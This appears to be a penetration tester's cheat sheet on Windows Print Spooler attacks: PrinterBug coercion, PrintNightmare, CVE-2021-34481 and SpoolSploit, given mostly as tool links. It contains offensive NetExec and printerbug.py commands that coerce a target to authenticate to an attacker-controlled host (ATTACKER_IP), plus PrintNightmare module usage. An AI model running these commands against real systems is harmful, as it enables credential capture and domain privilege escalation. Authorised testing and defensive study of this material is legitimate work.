Print Spooler

Spooler is running

nxc smb <ip> -u 'user' -p 'pass' -M spooler

https://bsky.app/profile/itm4n.bsky.social/post/3lcipb7lq4k2v

Printer Bug

MS-RPRN abuse (PrinterBug) | The Hacker Recipeswww.thehacker.recipes

MisconfigurationTrustee and Resource Delegation

nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP

or with printerbug.py

printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

NetNTLMV1 ?

GitHub - NotMedic/NetNTLMtoSilverTicket: SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver TicketGitHub

PrintNightmare

A Practical Guide to PrintNightmare in 2024itm4n’s blog

nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare

Itwasalladream

GitHub - byt3bl33d3r/ItWasAllADream: A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCEGitHub

Exploit

Windows Exploit

CVE-2021-34481

GitHub - vpn28/CVE-2021-34481: Check patch for CVE-2021-34481GitHub

GitHub - jacob-baines/concealed_position: Bring your own print driver privilege escalation toolGitHub

A Practical Guide to PrintNightmare in 2024itm4n’s blog

SpoolSploit

GitHub - BeetleChunks/SpoolSploit: A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.GitHub